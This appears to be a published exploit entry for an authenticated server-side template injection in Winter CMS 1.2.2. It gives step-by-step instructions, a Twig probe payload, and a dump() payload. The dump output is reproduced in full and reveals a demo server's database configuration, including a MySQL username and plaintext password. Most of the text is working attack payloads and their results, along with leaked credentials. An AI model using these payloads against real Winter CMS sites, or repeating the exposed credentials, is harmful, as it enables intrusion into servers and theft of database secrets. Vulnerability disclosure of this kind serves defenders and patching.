# Exploit Title: Winter CMS 1.2.2 - Server-Side Template Injection (SSTI) (Authenticated)
# Exploit Author: tmrswrr
# Date: 12/05/2023
# Vendor: https://wintercms.com/
# Software Link: https://github.com/wintercms/winter/releases/v1.2.2
# Vulnerable Version(s): 1.2.2
# Tested on: https://www.softaculous.com/demos/WinterCMS

1 ) Log in with admin credentials and click CMS > Pages field > Plugin components > https://demos6.demo.com/WinterCMS/backend/cms#secondarytab-cmslangeditormarkup
2 ) Write the SSTI payload : {{7*7}}
3 ) Save it, then click Preview : https://demos6.demo.com/WinterCMS/demo/plugins
4 ) You will see the result : 49 (the page markup was evaluated server-side as a Twig expression instead of being printed literally)

Payload : {{ dump() }}

Result (the dump exposes the application's database configuration, including the MySQL username and password; dump() is normally only registered when debug mode is enabled, so the demo presumably ran with debug on):

"*::database" => array:4 [▼
  "default" => "mysql"
  "connections" => array:4 [▼
    "sqlite" => array:5 [▼
      "database" => "/home/soft/public_html/WinterCMSmcviotyn9i/storage/database.sqlite"
      "driver" => "sqlite"
      "foreign_key_constraints" => true
      "prefix" => ""
      "url" => null
    ]
    "mysql" => array:15 [▼
      "charset" => "utf8mb4"
      "collation" => "utf8mb4_unicode_ci"
      "database" => "soft_pw3qsny"
      "driver" => "mysql"
      "engine" => "InnoDB"
      "host" => "localhost"
      "options" => []
      "password" => "8QSz9(pT)3"
      "port" => 3306
      "prefix" => ""
      "prefix_indexes" => true
      "strict" => true
      "unix_socket" => ""
      "url" => null
      "username" => "soft_pw3qsny"
    ]
    "pgsql" => array:12 [▶]
    "sqlsrv" => array:10 [▶]
  ]
  "migrations" => "migrations"
  "redis" => array:4 [▼
    "client" => "phpredis"
    "options" => array:2 [▼
      "cluster" => "redis"
      "prefix" => "winter_database_"
    ]
    "default" => array:5 [▼
      "database" => "0"
      "host" => "127.0.0.1"
      "password" => null
      "port" => "6379"
      "url" => null
    ]
    "cache" => array:5 [▼
      "database" => "1"
      "host" => "127.0.0.1"
      "password" => null
      "port" => "6379"
      "url" => null
    ]
  ]
]
]